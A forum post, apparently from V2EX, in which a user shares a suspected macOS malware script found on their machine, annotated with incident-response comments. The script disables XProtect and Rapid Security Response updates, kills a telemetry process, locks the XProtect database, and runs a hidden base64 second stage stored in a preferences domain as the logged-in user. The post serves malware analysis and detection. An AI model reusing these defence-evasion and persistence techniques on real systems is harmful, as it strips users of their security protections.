
macOS 疑似中毒：找到的主脚本如下

  1. macOS 疑似中毒

    找到的主脚本如下

    # Loader command as posted: the main script is kept base64-encoded in the
    # preferences domain `fqijeu` under key `lqqr_djhxqjf` and decoded from
    # there; the lines that follow appear to be the decoded result. Storing the
    # payload in a defaults domain keeps it out of the filesystem-visible script
    # body, so IR should collect that domain's plist for the user(s) this ran as.
    defaults read fqijeu lqqr_djhxqjf | base64 --decode
    # Prologue: log the time and effective user, then work from /Users/Shared
    # (world-writable on macOS). The cd is unchecked and there is no `set -e`,
    # so a failure here would silently leave the cwd unchanged.
    date
    whoami
    
    cd /Users/Shared
    pwd
    
    #######################################
    # Privileged stage (needs root to write /Library/Preferences):
    # degrades the host's built-in protections and keeps them degraded.
    # Globals:   none
    # Arguments: none
    # Outputs:   status lines to stdout
    # Returns:   0 (background jobs keep running after it returns)
    #######################################
    root_tasks() {
    
     # ConfigDataInstall=false turns off automatic install of XProtect/MRT
     # system data files; AllowRapidSecurityResponses=false blocks Rapid
     # Security Responses. Both are auditable with `defaults read` on this plist
     # and are a concrete IoC for this script.
     /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist ConfigDataInstall -bool false
     /usr/bin/defaults write /Library/Preferences/com.apple.SoftwareUpdate.plist AllowRapidSecurityResponses -bool false
    
     # Once per second, SIGKILL every process whose full command line matches
     # 'CloudTelemetryService' (pgrep -f, case-insensitive). Which product that
     # process belongs to is not visible here — identify it on the affected host.
     kill_processes() {
       while true; do
         pgrep -fi 'CloudTelemetryService' | xargs -r -I {} sh -c 'kill -9 {} && echo "killed PID {}"'
         sleep 1
       done
     }
    
     kill_processes &
    
     # Opens the XProtect database read-only, takes an exclusive flock (mode 2 =
     # LOCK_EX) and holds it indefinitely; presumably intended to obstruct
     # XProtect's own access to the file — confirm by checking lsof on XPdb.
     # `die $!` means the perl exits quietly if the file is absent.
     perl -e 'open my $fh, "<", "/var/protected/xprotect/XPdb" or die $!; flock($fh, 2) or die $!; while (1) { sleep 60; }' &
    
     echo "I am a root task $(whoami)"
    
    }
    
    #######################################
    # Blocks until a single ICMP echo to 1.1.1.1 succeeds (retrying every 5 s),
    # then runs the command or function named in $1.
    # Arguments: $1 - name of a command/function to execute once online
    # Outputs:   progress lines to stdout
    # Returns:   status of the trailing echo, not of "$1"
    #######################################
    network_tasks() {
     # `&>` is a bashism; the `-W1` timeout flag is platform-specific.
     while ! ping -c1 -W1 1.1.1.1 &> /dev/null ; do
      echo 'no net'
         sleep 5
     done
    
     echo 'net available'
     # Executes whatever name was passed in (here: the `task` function).
     "$1"
     echo 'network task completed.'
    }
    
    #######################################
    # Waits for an interactive console user, then launches the second-stage
    # payload as that user once the network is reachable.
    # Globals:   localuser (written; read by the nested task function)
    # Arguments: none
    # Outputs:   status lines to stdout
    # Returns:   0 (the network_tasks job keeps running in the background)
    #######################################
    localuser_tasks() {
    
     # Poll the SystemConfiguration console-user record every 5 s until a name
     # other than loginwindow is present (i.e. someone is logged in at the GUI).
     while true; do
         localuser=$(scutil <<< "show State:/Users/ConsoleUser" | awk '/Name :/ && ! /loginwindow/ { print $3 }')
    
         if [[ -n "$localuser" ]]; then
             break
         fi
    
         echo 'No logged-in user. Retrying...'
         sleep 5
     done
    
     echo "[LOGGED IN] $localuser"
    
     # Second stage: after a 30 s delay, run bash as the console user and have
     # it decode another base64 blob from the `fqijeu` defaults domain (key
     # `burlh_dqeur_rkq`) and pipe it into sh with SRC=Daemon in the
     # environment, output discarded, backgrounded. Because this runs as the
     # user, the blob is read from that user's copy of the domain (typically
     # ~/Library/Preferences/fqijeu.plist) — collect it for analysis.
     # The heredoc is unquoted but contains no expansions.
     task() {
      sleep 30
    
      sudo -u "$localuser" /bin/bash <<EOF
    defaults read 'fqijeu' 'burlh_dqeur_rkq' | base64 --decode | env SRC='Daemon' sh >/dev/null 2>&1 &
    EOF
    
     }
    
     # The payload is gated on connectivity (see network_tasks).
     network_tasks task &
    
    }
    
    #######################################
    # Periodic heartbeat plus a file-based kill switch.
    # Globals:   none
    # Arguments: none
    # Outputs:   status lines and the paths of removed files to stdout
    # Returns:   0 normally; calls exit when the kill-switch file exists
    #######################################
    loop_tasks() {
     echo 'Daemon is running...'
    
     # Kill switch: the presence of /Users/echo/.kill triggers self-removal.
     if [ -e "/Users/echo/.kill" ]; then
        echo 'killing...'
    
       # Deletes every file under /Library/LaunchDaemons/ whose contents match
       # 'echo.*base64.*sh' (case-insensitive, recursive). This implies the
       # persistence plist contains an echo|base64|sh command line — the same
       # grep is a useful hunt query on other hosts.
       grep -lir 'echo.*base64.*sh' /Library/LaunchDaemons/ 2>/dev/null | while read -r file; do
           echo "$file"
           rm -f "$file"
       done
    
       rm -f "/Users/echo/.kill"
    
       echo 'killed.'
    
       # The caller runs loop_tasks in a background subshell (`loop_tasks &`),
       # so this exit ends only that subshell; the already-running root and
       # user tasks and the main loop are not stopped by the kill switch.
       exit
     fi
    
    }
    
    # Entry point: both stages run concurrently in the background, then the
    # parent loops forever, forking loop_tasks every 60 s (each in its own
    # subshell, so the kill switch's exit does not stop this loop).
    root_tasks &
    localuser_tasks &
    
    while true; do
      loop_tasks &
      sleep 60
    done
    
    


    via V2EX - 技术 (author: maxbug)